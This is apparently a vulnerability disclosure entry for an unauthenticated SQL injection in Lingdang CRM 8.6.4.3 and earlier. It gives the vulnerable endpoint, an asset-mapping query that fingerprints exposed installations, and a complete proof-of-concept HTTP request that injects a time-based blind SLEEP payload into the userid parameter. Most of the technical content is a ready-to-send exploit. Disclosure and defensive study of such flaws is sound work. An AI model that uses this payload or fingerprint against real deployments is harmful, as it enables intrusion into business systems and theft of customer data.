【原创】上海灵当信息科技有限公司 Lingdang CRM <= 8.6.4.3 SQL注⼊漏洞


当前为私密分享,无需登录即可查看。


时间 作者 可见性 等级 Rank
2024-11-04 10:57:35 Mstir 私密的 高危 3

无描述...


漏洞描述

- Summary

灵当CRM是一款专为中小企业打造的智能客户关系管理工具,由上海灵当信息科技有限公司开发并运营。广泛应用于金融、教育、医疗、IT服务、房地产等多个行业领域,帮助企业实现客户个性化管理需求,提升企业竞争力。无论是新客户开拓、老客户维护,还是销售过程管理、服务管理等方面,灵当CRM都能提供全面、高效的解决方案。

- Lingdang CRM is an intelligent customer relationship management tool specifically designed for small and medium-sized enterprises. It is developed and operated by Shanghai Lingdang Information Technology Co., Ltd. It is widely used in various industries including finance, education, healthcare, IT services, and real estate. Lingdang CRM helps businesses meet their customer personalization management needs and enhances their competitiveness. Whether it's about acquiring new customers, maintaining existing ones, or managing the sales process and service management, Lingdang CRM provides comprehensive and efficient solutions.

灵当CRM 8.6.4.3 存在SQL注入漏洞,漏洞发生在/crm/WeiXinApp/marketing/index.php。

- LingDang CRM versions 8.6.4.3 and earlier contain an SQL injection vulnerability, located at /crm/WeiXinApp/marketing/index.php. This vulnerability can be exploited without any special permissions.

资产测绘

body="crmcommon/js/jquery/jquery-1.10.1.min.js" || (body="http://localhost:8088/crm/index.php" && body="ldcrm.base.js")

POC

GET /crm/WeiXinApp/marketing/index.php?module=Users&action=getActionList&us
erid=%27%20AND%20(SELECT%203408%20FROM%20(SELECT(SLEEP(5)))HtiS)--%20cbVc H
TTP/1.1
Host: 127.0.0.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (K
HTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,im
age/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

null
null


审核评价: 没有任何评价...